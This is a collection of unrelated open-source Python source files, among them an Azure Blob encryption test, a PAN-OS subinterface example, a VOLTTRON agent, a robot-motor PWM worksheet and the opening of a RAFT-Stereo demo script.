blob_client = container_client.get_blob_client("appendblob")
# providing encryption scope when upload the blob
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
# Use the provided encryption scope on the blob
self.assertEqual(resp['encryption_scope'], TEST_ENCRYPTION_KEY_SCOPE)
container_client.delete_container()
@pytest.mark.playback_test_only
@BlobPreparer()
def test_create_container_with_default_cpk_n_deny_override(self, storage_account_name, storage_account_key):
# Arrange
bsc = BlobServiceClient(
self.account_url(storage_account_name, "blob"),
credential=storage_account_key,
connection_data_block_size=1024,
max_single_put_size=1024,
min_large_block_upload_threshold=1024,
max_block_size=1024,
max_page_size=1024)
container_client = bsc.create_container(
'denyoverridecpkcontainer',
container_encryption_scope=TEST_CONTAINER_ENCRYPTION_KEY_SCOPE_DENY_OVERRIDE
)
container_props = container_client.get_container_properties()
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
for container in bsc.list_containers(name_starts_with='denyoverridecpkcontainer'):
self.assertEqual(
container_props.encryption_scope.default_encryption_scope,
TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
self.assertEqual(container_props.encryption_scope.prevent_encryption_scope_override, True)
blob_client = container_client.get_blob_client("appendblob")
# It's not allowed to set encryption scope on the blob when the container denies encryption scope override.
with self.assertRaises(HttpResponseError):
blob_client.upload_blob(b'aaaa', BlobType.AppendBlob, encryption_scope=TEST_ENCRYPTION_KEY_SCOPE)
resp = blob_client.upload_blob(b'aaaa', BlobType.AppendBlob)
self.assertEqual(resp['encryption_scope'], TEST_CONTAINER_ENCRYPTION_KEY_SCOPE.default_encryption_scope)
container_client.delete_container()
# ------------------------------------------------------------------------------
|
examples/shapes_from_glsl/window.py | szabolcsdombi/zengl | 116 | 12697511 | <gh_stars>100-1000
import pyglet
pyglet.options['shadow_window'] = False
pyglet.options['debug_gl'] = False
class Window(pyglet.window.Window):
def __init__(self, width, height):
self.time = 0.0
self.alive = True
self.mouse = (0, 0)
config = pyglet.gl.Config(
major_version=3,
minor_version=3,
forward_compatible=True,
double_buffer=False,
depth_size=0,
samples=0,
)
super().__init__(width=width, height=height, config=config, vsync=True)
width, height = self.get_framebuffer_size()
self.size = (width, height)
self.aspect = width / height
def on_resize(self, width, height):
pass
def on_draw(self):
pass
def on_mouse_motion(self, x, y, dx, dy):
self.mouse = (x, y)
def on_close(self):
self.alive = False
def update(self):
self.flip()
self.dispatch_events()
self.time += 1.0 / 60.0
return self.alive
@staticmethod
def run():
pyglet.app.run()
|
Codeforces/324 Division 2/Problem E/gen.py | VastoLorde95/Competitive-Programming | 170 | 12697539 | <reponame>VastoLorde95/Competitive-Programming
from random import *
import numpy
N = 10
a = numpy.random.permutation(N)
b = numpy.random.permutation(N)
print N
for i in a:
print i+1,
print
for i in b:
print i+1,
print
|
ghostwriter/rolodex/migrations/0021_project_timezone.py | bbhunter/Ghostwriter | 601 | 12697608 | # Generated by Django 3.1.13 on 2021-09-23 00:06
from django.db import migrations
import timezone_field.fields
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0020_auto_20210922_2337'),
]
operations = [
migrations.AddField(
model_name='project',
name='timezone',
field=timezone_field.fields.TimeZoneField(default='America/Los_Angeles', help_text='Timezone of the project / working hours', verbose_name='Project Timezone'),
),
]
|
contracts/utils/utils.py | andrevmatos/microraiden | 417 | 12697618 | from web3 import Web3
from populus.utils.wait import wait_for_transaction_receipt
from eth_utils import keccak, is_0x_prefixed, decode_hex
from web3.utils.threads import (
Timeout,
)
def pack(*args) -> bytes:
"""
Simulates Solidity's sha3 packing. Integers can be passed as tuples where the second tuple
element specifies the variable's size in bits, e.g.:
sha3((5, 32))
would be equivalent to Solidity's
sha3(uint32(5))
Default size is 256.
"""
def format_int(value, size):
assert isinstance(value, int)
assert isinstance(size, int)
if value >= 0:
return decode_hex('{:x}'.format(value).zfill(size // 4))
else:
return decode_hex('{:x}'.format((1 << size) + value))
msg = b''
for arg in args:
assert arg
if isinstance(arg, bytes):
msg += arg
elif isinstance(arg, str):
if is_0x_prefixed(arg):
msg += decode_hex(arg)
else:
msg += arg.encode()
elif isinstance(arg, int):
msg += format_int(arg, 256)
elif isinstance(arg, tuple):
msg += format_int(arg[0], arg[1])
else:
raise ValueError('Unsupported type: {}.'.format(type(arg)))
return msg
def sol_sha3(*args) -> bytes:
return keccak(pack(*args))
def check_succesful_tx(web3: Web3, txid: str, timeout=180) -> dict:
'''See if transaction went through (Solidity code did not throw).
:return: Transaction receipt
'''
receipt = wait_for_transaction_receipt(web3, txid, timeout=timeout)
txinfo = web3.eth.getTransaction(txid)
assert txinfo['gas'] != receipt['gasUsed']
return receipt
def wait(transfer_filter, timeout=30):
with Timeout(timeout) as timeout:
while not transfer_filter.get(False):
timeout.sleep(2)
|
services/core/VolttronCentralPlatform/vcplatform/vcconnection.py | architpansare/volttron | 406 | 12697640 | # -*- coding: utf-8 -*- {{{
# vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et:
#
# Copyright 2020, Battelle Memorial Institute.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# This material was prepared as an account of work sponsored by an agency of
# the United States Government. Neither the United States Government nor the
# United States Department of Energy, nor Battelle, nor any of their
# employees, nor any jurisdiction or organization that has cooperated in the
# development of these materials, makes any warranty, express or
# implied, or assumes any legal liability or responsibility for the accuracy,
# completeness, or usefulness or any information, apparatus, product,
# software, or process disclosed, or represents that its use would not infringe
# privately owned rights. Reference herein to any specific commercial product,
# process, or service by trade name, trademark, manufacturer, or otherwise
# does not necessarily constitute or imply its endorsement, recommendation, or
# favoring by the United States Government or any agency thereof, or
# Battelle Memorial Institute. The views and opinions of authors expressed
# herein do not necessarily state or reflect those of the
# United States Government or any agency thereof.
#
# PACIFIC NORTHWEST NATIONAL LABORATORY operated by
# BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY
# under Contract DE-AC05-76RL01830
# }}}
import logging
from volttron.platform.agent.known_identities import (
VOLTTRON_CENTRAL)
from volttron.platform.vip.agent import (Agent, RPC)
_log = logging.getLogger(__name__)
class VCConnection(Agent):
"""
This agent will connect to an instance with volttron.central agent connected
to it. The volttron.central agent will use this agent to communicate with
the platform.agent(vcp) running on the current instance of the platform.
"""
def __init__(self, **kwargs):
self._log = logging.getLogger(self.__class__.__name__)
super(VCConnection, self).__init__(**kwargs)
self._main_agent = None
def set_main_agent(self, main_agent):
"""
The main agent is the VCP that is using this agent to connect to the
remote volttron instance.
:param main_agent: the agent that instantiated this one.
:type VolttronCentralPlatform:
"""
self._main_agent = main_agent
def publish_to_vc(self, topic, message=None, headers={}):
"""
This method allows the main_agent to publish a message up to the
volttron.central instance.
:param topic:
:param message:
:param headers:
"""
self.vip.pubsub.publish('pubsub', topic, headers, message).get(timeout=5)
@RPC.export
def start_bacnet_scan(self, iam_topic, proxy_identity, low_device_id=None,
high_device_id=None, target_address=None,
scan_length=5):
"""
Starts a bacnet scan using the the named proxy_identity as the callee.
:param iam_topic:
:param proxy_identity:
:param low_device_id:
:param high_device_id:
:param target_address:
:param scan_length:
:return:
"""
self._main_agent.start_bacnet_scan(iam_vc_response_topic=iam_topic,
proxy_identity=proxy_identity,
low_device_id=low_device_id,
high_device_id=high_device_id,
target_address=target_address,
scan_length=scan_length)
@RPC.export
def get_instance_uuid(self):
"""
Retrieve the instance uuid for the vcp agent's instance.
:return:
"""
return self._main_agent.get_instance_uuid()
@RPC.export
def get_health(self):
"""
Retrieve the health of the vcp agent.
:return:
"""
return self._main_agent.vip.health.get_status()
@RPC.export
def start_agent(self, agent_uuid):
"""
Start an agent that is already present on the vcp instance.
:param agent_uuid:
:return:
"""
return self._main_agent.start_agent(agent_uuid)
@RPC.export
def stop_agent(self, agent_uuid):
"""
Stop an agent already running on the vcp instance.
:param agent_uuid:
:return:
"""
return self._main_agent.start_agent(agent_uuid)
@RPC.export
def restart(self, agent_uuid):
"""
Performs the stop and start operations on the vcp instance for an agent.
:param agent_uuid:
:return:
"""
stop_result = self.stop_agent(agent_uuid)
start_result = self.start_agent(agent_uuid)
return stop_result, start_result
@RPC.export
def agent_status(self, agent_uuid):
"""
Retrieves the status of a particular agent executing on the vcp
instance. The agent does not have to be executing in order to receive
it's status.
:param agent_uuid:
:return:
"""
return self._main_agent.agent_status(agent_uuid)
@RPC.export
def status_agents(self):
"""
Return all of the installed agents' statuses for the vcp instance.
:return:
"""
return self._main_agent.status_agents()
@RPC.export
def get_devices(self):
"""
Retrieves configuration entries from the config store that begin with
'devices'.
:return: dictionary of devices.
"""
self._log.debug("Getting devices in vcconnection.py")
return self._main_agent.get_devices()
@RPC.export
def publish_bacnet_props(self, proxy_identity, publish_topic, address,
device_id, filter=[]):
self._log.debug('Publishing bacnet props to topic: {}'.format(
publish_topic))
self._main_agent.publish_bacnet_props(
proxy_identity,
publish_topic,
address,
device_id,
filter=[])
@RPC.export
def store_agent_config(self, agent_identity, config_name, raw_contents,
config_type='raw'):
"""
Store an agent configuration on the volttron instance associated with
this agent.
:param agent_identity:
:param config_name:
:param raw_contents:
:param config_type:
:return: None
"""
return self._main_agent.store_agent_config(agent_identity, config_name,
raw_contents, config_type)
@RPC.export
def list_agent_configs(self, agent_identity):
"""
List the agent configuration files stored on the volttron instance
associated with this agent.
:param agent_identity: Agent identity to retrieve configuration from.
:return: A list of the configuration names.
"""
return self._main_agent.list_agent_configs(agent_identity)
@RPC.export
def get_agent_config(self, agent_identity, config_name, raw=True):
"""
Retrieve the configuration from the config store of the passed agent
identity.
:param agent_identity:
:param config_name:
:param raw:
:return: The stored configuration.
"""
return self._main_agent.get_agent_config(agent_identity, config_name,
raw)
@RPC.export
def delete_agent_config(self, agent_identity, config_name):
"""
Deletes the configuration from the config store of the passed agent
identity.
:param agent_identity:
:param config_name:
:return: The stored configuration.
"""
return self._main_agent.delete_agent_config(agent_identity, config_name)
@RPC.export
def subscribe_to_vcp(self, prefix, prefix_on_vc):
"""
Allows volttron.central to listen to the message bus on vcp instance.
:param prefix: The prefix to listen for.
:param prefix_on_vc:
The prefix to publish to on volttron central instance.
"""
self._log.info("VC subscribing to prefix: {}".format(prefix))
self._log.info("VCP will publish to {} on VC".format(prefix_on_vc))
def subscription_wrapper(peer, sender, bus, topic, headers,
message):
# We only publish up to vc for things that aren't forwarded.
if 'X-Forwarded' in headers:
return
self._log.debug("publishing to VC topic: {}".format(
prefix_on_vc + topic
))
# Prepend the specified prefix to the topic that was passed
# to the method
self.publish_to_vc(prefix_on_vc+topic, message, headers)
# Use the main agent to do the subscription on.
self._main_agent.vip.pubsub.subscribe('pubsub',
prefix,
subscription_wrapper)
@RPC.export
def call(self, platform_method, *args, **kwargs):
return self._main_agent.call(platform_method, *args, **kwargs)
def is_connected(self):
connected = self.vip.hello().get(timeout=5) is not None
self._log.debug("is_connected returning {}".format(connected))
return connected
def is_peer_connected(self, peer=VOLTTRON_CENTRAL):
connected = peer in self.vip.peerlist().get(timeout=5)
self._log.debug("is_connected returning {}".format(connected))
return connected
@RPC.export
def route_to_agent_method(self, id, agent_method, params):
"""
Calls a method on an installed agent running on the platform.
.. note::
This method only valid for installed agents not dynamic agents.
:param id:
:param agent_method:
:param params:
:return:
"""
self._log.debug("Routing method: {}".format(agent_method))
return self._main_agent.route_request(id, agent_method, params)
@RPC.export
def get_vip_addresses(self):
"""
Retrieves the vip addresses that were specified in the configuration
file or via command line.
:return:
"""
return self._main_agent.get_external_vip_addresses()
@RPC.export
def get_instance_name(self):
return self._main_agent.get_instance_name()
@RPC.export
def start_agent(self, agent_uuid):
"""
Calls start_agent method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:param agent_uuid:
:return:
"""
self._main_agent.start_agent(agent_uuid)
@RPC.export
def stop_agent(self, agent_uuid):
"""
Calls stop_agent method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:param agent_uuid:
:return:
"""
proc_result = self._main_agent.stop_agent(agent_uuid)
return proc_result
@RPC.export
def restart_agent(self, agent_uuid):
"""
Calls restart method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:param agent_uuid:
:return:
"""
return self._main_agent.restart(agent_uuid)
@RPC.export
def agent_status(self, agent_uuid):
"""
Calls agent_status method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:param agent_uuid:
:return:
"""
return self._main_agent.agent_status(agent_uuid)
@RPC.export
def status_agents(self):
"""
Calls status_agents method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:return:
"""
return self._main_agent.status_agents()
@RPC.export
def list_agents(self):
"""
Calls list_agents method on the vcp main agent instance.
.. note::
This method only valid for installed agents not dynamic agents.
:return:
"""
return self._main_agent.list_agents()
@RPC.export
def install_agent(self, local_wheel_file):
"""
Installs
:param local_wheel_file:
:return:
"""
return self._main_agent.install_agent
|
modeling/__init__.py | MatthewAbugeja/agw | 501 | 12697674 | # encoding: utf-8
from .baseline import Baseline
def build_model(cfg, num_classes):
model = Baseline(num_classes, cfg.MODEL.LAST_STRIDE, cfg.MODEL.PRETRAIN_PATH, cfg.MODEL.NAME,
cfg.MODEL.GENERALIZED_MEAN_POOL, cfg.MODEL.PRETRAIN_CHOICE)
return model |
CamJam Edukit 3 - RPi.GPIO/Code/7-pwm.py | vincecr0ft/EduKit3 | 132 | 12697691 | # CamJam EduKit 3 - Robotics
# Worksheet 7 - Controlling the motors with PWM
import RPi.GPIO as GPIO # Import the GPIO Library
import time # Import the Time library
# Set the GPIO modes
GPIO.setmode(GPIO.BCM)
GPIO.setwarnings(False)
# Set variables for the GPIO motor pins
pinMotorAForwards = 10
pinMotorABackwards = 9
pinMotorBForwards = 8
pinMotorBBackwards = 7
# How many times to turn the pin on and off each second
Frequency = 20
# How long the pin stays on each cycle, as a percent (here, it's 30%)
DutyCycle = 30
# Setting the duty cycle to 0 means the motors will not turn
Stop = 0
# Set the GPIO Pin mode to be Output
GPIO.setup(pinMotorAForwards, GPIO.OUT)
GPIO.setup(pinMotorABackwards, GPIO.OUT)
GPIO.setup(pinMotorBForwards, GPIO.OUT)
GPIO.setup(pinMotorBBackwards, GPIO.OUT)
# Set the GPIO to software PWM at 'Frequency' Hertz
pwmMotorAForwards = GPIO.PWM(pinMotorAForwards, Frequency)
pwmMotorABackwards = GPIO.PWM(pinMotorABackwards, Frequency)
pwmMotorBForwards = GPIO.PWM(pinMotorBForwards, Frequency)
pwmMotorBBackwards = GPIO.PWM(pinMotorBBackwards, Frequency)
# Start the software PWM with a duty cycle of 0 (i.e. not moving)
pwmMotorAForwards.start(Stop)
pwmMotorABackwards.start(Stop)
pwmMotorBForwards.start(Stop)
pwmMotorBBackwards.start(Stop)
# Turn all motors off
def stopmotors():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn both motors forwards
def forwards():
pwmMotorAForwards.ChangeDutyCycle(DutyCycle)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(DutyCycle)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn both motors backwards
def backwards():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(DutyCycle)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(DutyCycle)
# Turn left
def left():
pwmMotorAForwards.ChangeDutyCycle(Stop)
pwmMotorABackwards.ChangeDutyCycle(DutyCycle)
pwmMotorBForwards.ChangeDutyCycle(DutyCycle)
pwmMotorBBackwards.ChangeDutyCycle(Stop)
# Turn Right
def right():
pwmMotorAForwards.ChangeDutyCycle(DutyCycle)
pwmMotorABackwards.ChangeDutyCycle(Stop)
pwmMotorBForwards.ChangeDutyCycle(Stop)
pwmMotorBBackwards.ChangeDutyCycle(DutyCycle)
# Your code to control the robot goes below this line
forwards()
time.sleep(1) # Pause for 1 second
left()
time.sleep(0.5) # Pause for half a second
forwards()
time.sleep(1)
right()
time.sleep(0.5)
backwards()
time.sleep(0.5)
stopmotors()
GPIO.cleanup()
|
examples/bulk_subinterfaces.py | haginara/pan-os-python | 162 | 12697694 | #!/usr/bin/env python
# Copyright (c) 2017, Palo Alto Networks
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
bulk_subinterfaces.py
=====================
Use bulk operations to create / delete hundreds of firewall interfaces.
NOTE: Please update the hostname and auth credentials variables
before running.
The purpose of this script is to use and explain both the bulk operations
as it relates to subinterfaces as well as the new function that organizes
objects into vsys. This script will show how the new bulk operations
correctly handle when subinterface objects are in separate vsys trees.
"""
import datetime
import random
import sys
from panos import device, firewall, network
HOSTNAME = "127.0.0.1"
USERNAME = "admin"
PASSWORD = "<PASSWORD>"
INTERFACE = "ethernet1/5"
def main():
# Before we begin, you'll need to use the pan-os-python documentation both
# for this example and for any scripts you may write for yourself. The
# docs can be found here:
#
# http://pan-os-python.readthedocs.io/en/latest/reference.html
#
# First, let's create the firewall object that we want to modify.
fw = firewall.Firewall(HOSTNAME, USERNAME, PASSWORD)
print("Firewall system info: {0}".format(fw.refresh_system_info()))
print("Desired interface: {0}".format(INTERFACE))
# Sanity Check #1: the intent here is that the interface we
# specified above should not already be in use. If the interface is
# already in use, then just quit out.
print("Making sure interface is not currently in use...")
interfaces = network.EthernetInterface.refreshall(fw, add=False)
for eth in interfaces:
if eth.name == INTERFACE:
print(
"Interface {0} already in use! Please choose another".format(INTERFACE)
)
return
# Sanity Check #2: this has to be a multi-vsys system. So let's make
# sure that we have multiple vsys to work with. If there is only one
# vsys, quit out.
#
# Pulling the entire vsys config from each vsys is going to be large amount
# of XML, so we'll specify that we only need the names of the different
# vsys, not their entire subtrees.
vsys_list = device.Vsys.refreshall(fw, name_only=True)
print("Found the following vsys: {0}".format(vsys_list))
if len(vsys_list) < 2:
print("Only {0} vsys present, need 2 or more.".format(len(vsys_list)))
return
# Let's make our base interface that we're going to make subinterfaces
# out of.
print("Creating base interface {0} in layer2 mode".format(INTERFACE))
base = network.EthernetInterface(INTERFACE, "layer2")
# Like normal, after creating the object, we need to add it to the
# firewall, then finally invoke "create()" to create it.
fw.add(base)
base.create()
# Now let's go ahead and make all of our subinterfaces.
eth = None
for tag in range(1, 601):
name = "{0}.{1}".format(INTERFACE, tag)
eth = network.Layer2Subinterface(name, tag)
# Choose one of the vsys at random to put it into.
vsys = random.choice(vsys_list)
# Now add the subinterface to that randomly chosen vsys.
vsys.add(eth)
# You'll notice that we didn't invoke "create()" on the subinterfaces like
# you would expect. This is because we're going to use the bulk create
# function to create all of the subinterfaces in one shot, which has huge
# performance gains from doing "create()" on each subinterface one-by-one.
#
# The function we'll use is "create_similar()". Create similar is saying,
# "I want to create all objects similar to this one in my entire pan-os-python
# object tree." In this case, since we'd be invoking it on a subinterface
# of INTERFACE (our variable above), we are asking pan-os-python to create all
# subinterfaces of INTERFACE, no matter which vsys it exists in.
#
# We just need any subinterface to do this. Since our last subinterface
# was saved to the "eth" variable in the above loop, we can just use that
# to invoke "create_similar()".
print("Creating subinterfaces...")
start = datetime.datetime.now()
eth.create_similar()
print("Creating subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Now let's explore updating them. Let's say this is a completely
# different script, and we want to update all of the subinterfaces
# for INTERFACE. Since this is a completely new script, we don't have any
# information other than the firewall and the interface INTERFACE. So
# let's start from scratch at this point, and remake the firewall object
# and connect.
print("\n--------\n")
fw = firewall.Firewall(HOSTNAME, USERNAME, PASSWORD)
print("Firewall system info: {0}".format(fw.refresh_system_info()))
print("Desired interface: {0}".format(INTERFACE))
# Make the base interface object and connect it to our pan-os-python tree.
base = network.EthernetInterface(INTERFACE, "layer2")
fw.add(base)
# Now let's get all the subinterfaces for INTERFACE. Since our firewall's
# default vsys is "None", this will get all subinterfaces of INTERFACE,
# regardless of which vsys it exists in.
print("Refreshing subinterfaces...")
subinterfaces = network.Layer2Subinterface.refreshall(base)
print("Found {0} subinterfaces".format(len(subinterfaces)))
# Now let's go ahead and update all of them.
for eth in subinterfaces:
eth.comment = "Tagged {0} and in vsys {1}".format(eth.tag, eth.vsys)
# Now that we have updated all of the subinterfaces, we need to save
# the changes to the firewall. But hold on a second, the vsys for these
# subinterfaces is currently "None". We first need to organize these
# subinterfaces into the vsys they actually exist in before we can
# apply these changes to the firewall.
#
# This is where you can use the function "organize_into_vsys()". This
# takes all objects currently attached to your pan-os-python object tree
# and organizes them into the vsys they belong to.
#
# We haven't gotten the current vsys yet (this is a new script, remember),
# but the function can take care of that for us. So let's just invoke it
# to organize our pan-os-python object tree into vsys.
print("Organizing subinterfaces into vsys...")
fw.organize_into_vsys()
# Now we're ready to save our changes. We'll use "apply_similar()",
# and it behaves similarly to "create_similar()" in that you can invoke
# it from any subinterface of INTERFACE and it will apply all of the
# changes to subinterfaces of INTERFACE only.
#
# We just need one subinterface to invoke this function. Again, we'll
# simply use the subinterface currently saved in the "eth" variable
# from our update loop we did just above.
#
# NOTE: As an "apply()" function, apply does a replace of config, not
# a simple update. So you must be careful that all other objects are
# currently attached to your pan-os-python object tree when using apply
# functions. In our case, we have already refreshed all layer2
# subinterfaces, and we are the only ones working with INTERFACE, so we
# are safe to use this function.
print("Updating all subinterfaces...")
start = datetime.datetime.now()
eth.apply_similar()
print("Updating subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Finally, all that's left is to delete all of the subinterfaces. This
# is just like you think: we first need to refresh all of the
# subinterfaces of INTERFACE, organize them into their appropriate vsys,
# then invoke "delete_similar()" to delete everything.
print("Deleting all subinterfaces...")
start = datetime.datetime.now()
eth.delete_similar()
print("Deleting subinterfaces took: {0}".format(datetime.datetime.now() - start))
# Lastly, let's just delete the base interface INTERFACE.
print("Deleting base interface...")
base.delete()
# And now we're done! If performance is a bottleneck in your automation,
# or dealing with vsys is troublesome, consider using the vsys organizing
# and/or bulk functions!
print("Done!")
if __name__ == "__main__":
# This script doesn't take command line arguments. If any are passed in,
# then print out the script's docstring and exit.
if len(sys.argv) != 1:
print(__doc__)
else:
# No CLI args, so run the main function.
main()
|
Lib/async/examples/disconnect.py | pyparallel/pyparallel | 652 | 12697699 | import time
import async
class Disconnect:
pass
server = async.server('10.211.55.3', 20019)
async.register(transport=server, protocol=Disconnect)
async.run()
|
up/models/losses/loss.py | ModelTC/EOD | 196 | 12697705 | <filename>up/models/losses/loss.py
# Import from third library
from torch.nn.modules.loss import _Loss
def _reduce(loss, reduction, **kwargs):
if reduction == 'none':
ret = loss
elif reduction == 'mean':
normalizer = loss.numel()
if kwargs.get('normalizer', None):
normalizer = kwargs['normalizer']
ret = loss.sum() / normalizer
elif reduction == 'sum':
ret = loss.sum()
else:
raise ValueError(reduction + ' is not valid')
return ret
class BaseLoss(_Loss):
# do not use syntax like `super(xxx, self).__init__,
# which will cause infinited recursion while using class decorator`
def __init__(self,
name='base',
reduction='none',
loss_weight=1.0):
r"""
Arguments:
- name (:obj:`str`): name of the loss function
- reduction (:obj:`str`): reduction type, choice of mean, none, sum
- loss_weight (:obj:`float`): loss weight
"""
_Loss.__init__(self, reduction=reduction)
self.loss_weight = loss_weight
self.name = name
def __call__(self, input, target, reduction_override=None, normalizer_override=None, **kwargs):
r"""
Arguments:
- input (:obj:`Tensor`)
- reduction (:obj:`Tensor`)
- reduction_override (:obj:`str`): choice of 'none', 'mean', 'sum', override the reduction type
defined in __init__ function
- normalizer_override (:obj:`float`): override the normalizer when reduction is 'mean'
"""
reduction = reduction_override if reduction_override else self.reduction
assert (normalizer_override is None or reduction == 'mean'), \
f'normalizer is not allowed when reduction is {reduction}'
loss = _Loss.__call__(self, input, target, reduction, normalizer=normalizer_override, **kwargs)
return loss * self.loss_weight
def forward(self, input, target, reduction, normalizer=None, **kwargs):
raise NotImplementedError
|
mmhuman3d/data/data_converters/builder.py | ykk648/mmhuman3d | 472 | 12697711 | from mmcv.utils import Registry
DATA_CONVERTERS = Registry('data_converters')
def build_data_converter(cfg):
"""Build data converter."""
return DATA_CONVERTERS.build(cfg)
|
tools/Sikuli/SelectStringsInText.sikuli/GoToProcedure.py | marmyshev/vanessa-automation | 296 | 12697737 | <gh_stars>100-1000
path2file = sys.argv[1]
file = open(path2file, 'r')
while True:
line = file.readline()
if not line:
break
stroka = unicode(line, 'utf-8')
type('f', KeyModifier.CTRL)
sleep(1)
paste(stroka)
sleep(1)
type(Key.ENTER)
sleep(1)
break
exit(0)
|
corehq/apps/users/management/commands/resync_location_user_data.py | dimagilg/commcare-hq | 471 | 12697739 | from django.core.management.base import BaseCommand
from dimagi.utils.couch.database import iter_docs
from corehq.apps.locations.models import SQLLocation
from corehq.apps.users.models import CommCareUser
class Command(BaseCommand):
help = "Re-syncs location user data for all mobile workers in the domain."
def add_arguments(self, parser):
parser.add_argument('domain')
def process_user(self, user):
if user.location_id:
user.set_location(SQLLocation.objects.get(location_id=user.location_id))
else:
user.unset_location()
def handle(self, domain, **options):
ids = (
CommCareUser.ids_by_domain(domain, is_active=True) +
CommCareUser.ids_by_domain(domain, is_active=False)
)
for doc in iter_docs(CommCareUser.get_db(), ids):
user = CommCareUser.wrap(doc)
try:
self.process_user(user)
except Exception as e:
print("Error processing user %s: %s" % (user._id, e))
|
examples/libtest/I18N/__init__.py | takipsizad/pyjs | 739 | 12697748 | <reponame>takipsizad/pyjs
class I18N(object):
def example(self):
return "This is an example"
def another_example(self):
return "This is another example"
i18n = I18N()
locale = 'en'
domains = []
import sys
import domain
domains.append('domain')
import domain.subdomain
domains.append('domain.subdomain')
def set_locale(loc):
global i18n
try:
path = "I18N.%s" % loc
c = __import__(path)
except ImportError, e:
print "Failed to import %s" % e
domains.sort()
for domain in domains:
try:
path = "I18N.%s.%s" % (domain, loc)
__import__(path)
except ImportError, e:
print "Failed to import %s" % e
|
exercises/zh/exc_01_08_01.py | Jette16/spacy-course | 2,085 | 12697750 | <gh_stars>1000+
import spacy
nlp = spacy.load("zh_core_web_sm")
text = "写入历史了:苹果是美国第一家市值超过一万亿美元的上市公司。"
# 处理文本
doc = ____
for token in doc:
# 获取词符文本、词性标注及依存关系标签
token_text = ____.____
token_pos = ____.____
token_dep = ____.____
# 规范化打印的格式
print(f"{token_text:<12}{token_pos:<10}{token_dep:<10}")
|
zerver/tests/test_data_types.py | TylerPham2000/zulip | 17,004 | 12697755 | <reponame>TylerPham2000/zulip
from zerver.lib.data_types import (
DictType,
EnumType,
Equals,
ListType,
NumberType,
OptionalType,
StringDictType,
TupleType,
UnionType,
UrlType,
schema,
)
from zerver.lib.test_classes import ZulipTestCase
class MiscTest(ZulipTestCase):
def test_data_type_schema(self) -> None:
"""
We really only test this to get test coverage. The
code covered here is really only used in testing tools.
"""
test_schema = DictType(
[
("type", Equals("realm")),
("maybe_n", OptionalType(int)),
("s", str),
("timestamp", NumberType()),
("flag", bool),
("tup", TupleType([int, str])),
("level", EnumType([1, 2, 3])),
("lst", ListType(int)),
("config", StringDictType(str)),
("value", UnionType([int, str])),
("url", UrlType()),
]
)
expected = """
test (dict):
config (string_dict):
value: str
flag: bool
level in [1, 2, 3]
lst (list):
type: int
maybe_n: int
s: str
timestamp: number
tup (tuple):
0: int
1: str
type in ['realm']
url: str
value (union):
type: int
type: str
"""
self.assertEqual(schema("test", test_schema).strip(), expected.strip())
|
demo.py | voigta/RAFT-Stereo | 172 | 12697793 | <reponame>voigta/RAFT-Stereo
import sys
sys.path.append('core')
import argparse
import glob
import numpy as np
import torch
from tqdm import tqdm
from pathlib import Path
from raft_stereo import RAFTStereo
from utils.utils import InputPadder
from PIL import Image
from matplotlib import pyplot as plt
DEVICE = 'cuda'
def load_image(imfile):
img = np.array(Image.open(imfile)).astype(np.uint8)
img = torch.from_numpy(img).permute(2, 0, 1).float()
return img[None].to(DEVICE)
def demo(args):
model = torch.nn.DataParallel(RAFTStereo(args), device_ids=[0])
model.load_state_dict(torch.load(args.restore_ckpt))
model = model.module
model.to(DEVICE)
model.eval()
output_directory = Path(args.output_directory)
output_directory.mkdir(exist_ok=True)
with torch.no_grad():
left_images = sorted(glob.glob(args.left_imgs, recursive=True))
right_images = sorted(glob.glob(args.right_imgs, recursive=True))
print(f"Found {len(left_images)} images. Saving files to {output_directory}/")
for (imfile1, imfile2) in tqdm(list(zip(left_images, right_images))):
image1 = load_image(imfile1)
image2 = load_image(imfile2)
padder = InputPadder(image1.shape, divis_by=32)
